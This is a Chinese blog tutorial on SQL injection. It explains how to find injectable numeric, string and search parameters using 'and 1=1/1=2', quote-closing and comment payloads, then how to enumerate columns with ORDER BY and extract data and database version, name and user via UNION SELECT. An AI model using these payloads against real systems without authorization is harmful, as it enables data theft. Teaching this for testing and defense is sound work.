美文网首页
SQL inject

SQL inject

作者: L_MAO | 来源:发表于2018-06-24 14:47 被阅读0次

1 基本概念

1.1 SQL inject 漏洞概述

    在owasp发布的top 10漏洞里面,注入漏洞一直是危害排名第一,其中主要是指数据库注入型漏洞。

    数据库注入漏洞,主要是开发人员在构建代码的时候,对输入边界没有进行过滤或者过滤不足,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露的一种漏洞。

例如:

1.2 SQL inject漏洞攻击流程及注入类型

1.2.1 注入点发现

自动方式:使用web漏洞扫描工具,自动进行注入点的发现。

手动方式:手工构造sql语句进行注入点的发现。


常见注入点类型:

数字型:    user_id=$id

字符型:    user_id="$id"

搜索型:    text LIKE '%{_GET['search']}%'


判断注入点:

数字型注入:    http://www.example.com/?id=7

提交:7    http://www.example.com/?id=7;

数据库执行:    select *from example_table where id=7;

显示正常页面

提交:7 and 1=1     http://www.example.com/?id=7 and 1=1;

数据库执行    select *from example_table where id=7 and 1=1;

显示正常页面

提交:7 and 1=2     http://www.example.com/?id=7 and 1=2;

数据库执行    select *from example_table where id=7 and 1=2;

显示异常页面,说明and 1=2被数据库进行了处理。

单引号测试:http://www.example.com/?id=`;

显示异常页面报错,可以通过报错的信息知道,后台是否对单引号进行了处理。


字符型注入:http://www.example.com/?name='8'

原理同数字型注入。

提交:8

select *from example_table where name='8';

提交:8 and 1=1

 select *from example_table where name='8 and 1=1';

并不会成功。

提交:8’ and 1=1 --  注释掉数据库中后面的单引号。

select *from example_table where name='8’ and 1=1-- ';    

提交:8’ and 1=2 --  注释掉数据库中后面的单引号。

select *from example_table where name='8’ and 1=2-- ';

单引号测试:

select *from example_table where name='‘’; 

语法报错,根据错误信息确认是否存在注入点。


搜索性注入:http://www.example.com/search.php?search=1

输入1:

select *from comment where comment_tex like '%1%';

输入1%’ and 1=1-- 或者 1%’ and '%1%' = '%2

select *from comment where comment_tex like '%1%' and 1=1-- %';

select *from comment where comment_tex like '%1%' and '%2%';

总而言之,就是对SQL中的各类型的输入进行闭合测试,构造合法SQL,欺骗后台执行。


1.2.2 信息获取

环境信息:数据库类型、数据库版本、操作系统版本、用户信息等

数据库信息:数据库名称、数据库表、表字段、字段内容(加密内容破解)。

onion联合查询:

    想要获得更多的信息可以使用onion联合查询,联合查询的时候列数需要和主查询相同。如何确认主查询的列数呢?

    使用order by确认主查询的列,就可以使用union构造相应的查询。order by x 是对结果进行排序,按照第x列进行排序,默认数字0-9,字母a-z,如果查询出来的结果有2列,说明这个语句查询了两个字段。

    如:提交1' order by 2# 回显正常,1' order by 3#提示:unknown clown,则表示一共有2列。

    接下来就可以构造联合查询了,先构造一个不成立的查询(或空条件),使得前面查询结果为空,然后使用union 1,2进行求值。这样就可以得到每个字段的名称,select 字段1、字段2 from users where id = ‘1’ union select 字段1,字段2 # 。

可以通过select version();获取当前数据库版本;

select database();获取当前数据库;

select user();取得当前登录的用户;




相关文章

网友评论

      本文标题:SQL inject

      本文链接:https://www.haomeiwen.com/subject/rqnjyftx.html